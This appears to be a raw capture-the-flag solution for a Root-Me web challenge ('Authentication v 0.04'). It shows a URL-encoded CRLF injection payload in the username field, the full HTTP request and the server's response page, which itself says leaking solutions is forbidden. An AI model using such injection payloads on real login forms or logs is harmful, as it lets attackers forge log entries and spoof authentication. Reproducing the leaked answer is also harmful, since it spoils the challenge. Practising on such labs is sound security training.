Username 
%61%64%6d%69%6e%20%61%75%74%68%65%6e%74%69%63%61%74%65%64%2e%0d%0aadmin
REquest 
GET /web-serveur/ch14/?username=%61%64%6d%69%6e%20%61%75%74%68%65%6e%74%69%63%61%74%65%64%2e%0d%0aadmin&password=admin HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://challenge01.root-me.org/web-serveur/ch14/?username=admin&password=admin
Cookie: PHPSESSID=1spl0icp6sd80inpoke4ndobs2
Connection: close
Upgrade-Insecure-Requests: 1

Response


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Apr 2017 18:32:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 983


      <html>
     <body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe><p class='leak'><a href='https://www.root-me.org/en/breve/Publishing-solutions-on-Internet'>Leaking solutions on Internet is forbidden</a></p>
	<h1>Authentication v 0.04</h1>
	<form action="" method="GET">
	  Login&nbsp;<br/>
	  <input type="text" name="username" /><br/><br/>
	  Password&nbsp;<br/>
	  <input type="password" name="password" /><br/><br/>
	  <br/><br/>
